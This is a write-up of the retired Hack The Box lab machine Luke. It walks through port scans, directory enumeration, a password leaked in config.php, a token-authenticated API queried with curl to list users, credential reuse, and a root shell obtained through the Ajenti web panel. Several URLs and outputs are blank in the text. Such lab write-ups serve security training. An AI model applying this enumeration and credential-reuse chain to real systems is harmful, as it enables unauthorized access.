Writeup for the retired HTB machine Luke
Link: https://www.hackthebox.eu/home/machines/profile/190


A qick portscan reveals multiple open ports:

21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)  
| ftp-anon: Anonymous FTP login allowed (FTP code 230)  
22/tcp   open  ssh?  
3000/tcp open  http    Node.js Express framework  
8000/tcp open  http    Ajenti http control panel  

The FTP holds a note from Derry to Chihiro, which reveals these two usernames.

Dirb scan for main

As there are multiple websites hosted, all of them are checked for subfolders and interesting files:

START_TIME: Sun Sep  1 15:04:07 2019
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

---- Scanning URL: ----
==> DIRECTORY:                                                              
+ (CODE:200|SIZE:3138)                                                
==> DIRECTORY:                                                               
+ (CODE:200|SIZE:1093)                                                   
+ (CODE:401|SIZE:381)                                                 
==> DIRECTORY:                                                           

Dirb scan for 3000:

WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

---- Scanning URL: ----
+ (CODE:200|SIZE:13)                                                  
+ (CODE:200|SIZE:56) 

gobuster for main

As the Dirb scans were not considering file extensions in their called configuration, a correctly configured gobuster scan is conducted as well:

Important: Check for extensions! (-x)
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

2019/09/01 15:58:46 Starting gobuster
/index.html (Status: 200)
/login.php (Status: 200)
/member (Status: 301)
/management (Status: 401)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/config.php (Status: 200)
/LICENSE (Status: 200)
Progress: 163025 / 220561 (73.91%)^C
[!] Keyboard interrupt detected, terminating.

This yields, which reveals credentials: root:Zk6heYCyv6ZE9Xcg These creds can be used to log in to :3000/login, but using username root doesn’t work… but admin does.

curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'

The resulting token can be used to enumerate users: curl -s -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'Authorization: Bearer INSERTTOKENHERE'

[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]

By enumerating everything on port 3000, one can observe that the endpoint /user/{username} exists. So we can query for every single user:

curl -s -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'Authorization: Bearer INSERTTOKENHERE'
which yields:


with these, we can try to login to /management and find a config.json. That one holds credentials as well.
With these credentials, one can login to :8000 (Ajenti).

Ajenti provides a comfortable web interface for management - including a Terminal (located under Tools).
Opening that Terminal yields a root shell on the system that can be used to print the root flag.